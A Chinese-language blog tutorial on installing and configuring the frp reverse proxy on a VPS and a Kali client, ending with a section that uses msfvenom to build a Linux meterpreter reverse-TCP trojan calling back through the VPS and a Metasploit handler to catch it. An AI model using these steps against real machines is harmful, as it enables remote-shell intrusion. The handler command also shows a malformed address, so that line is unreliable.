frp反向代理

frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网

frp分为客户端和服务端,客户端安装在本地的机子,服务端在vps上,一般我们在内网开设了一个80端口但是因为处于内网不能够直接访问所以需要将80端口映射到公网的vps的某个端口上,这样我们访问这台vps那个端口就相当于访问内网的80端口,通过frp反向代理可以帮助我们解决这样的问题

项目地址: https://github.com/fatedier/frp/releases

frp反向代理_第1张图片
第一个是服务端,第二个为客户端linux和win都支持
服务端下载frp和配置

wget https://github.com/fatedier/frp/releases/download/v0.41.0/frp_0.41.0_linux_amd64.tar.gz
tar zxvf frp_0.41.0_linux_amd64.tar.gz
cd frp_0.41.0_linux_amd64
rm -rf frpc*

frp反向代理_第2张图片
编辑frps.ini

vi frps.ini
bind_port=7000
token=moonsec2020

启动frp

 ./frps -c frps.ini

设置开机自启这个服务
vi /lib/systemd/system/frps.service

[Unit]
#服务描述
Description=frpc service 
After=network.target syslog.target
Wants=network.target

[Service]
Type=simple
#执行命令 
ExecStart=/root/frp/frps -c /root/frp/frps.ini

[Install]
WantedBy=multi-user.target

启动frp
systemctl daemon-reload
systemctl start frps
systemctl enable frps

客户端配置,这里我们用的kali作为客户端

wget https://github.com/fatedier/frp/releases/download/v0.41.0/frp_0.41.0_linux_amd64.tar.gz

tar zxvf frp_0.41.0_linux_amd64.tar.gz

cd frp_0.41.0_linux_amd64

vi frpc.ini
                      
# frpc.ini
[common]
server_addr = *.*.*.*
server_port = 7000
token = moonsec2020

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000

这里server_addr填上你的服务器地址
local_port = 22
remote_port = 6000
这里是将本地的22端口映射到6000端口
开启frp
./frpc -c frpc.ini

MSF与frp反向代理
生成木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=****  LPORT=8000  -f elf > shell.elf
这里的lhost 应为服务器地址 LPORT 为反向代理端口
[common]
server_addr = ****
server_port = 7000
token=moonsec2020

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000


[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 8000

启动frp
./frpc -c frpc.ini

开启监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.01
set lport 6666
exploit

这里的lhost必须是127.0.0.1不然会出错

你可能感兴趣的:(frp反向代理,服务器)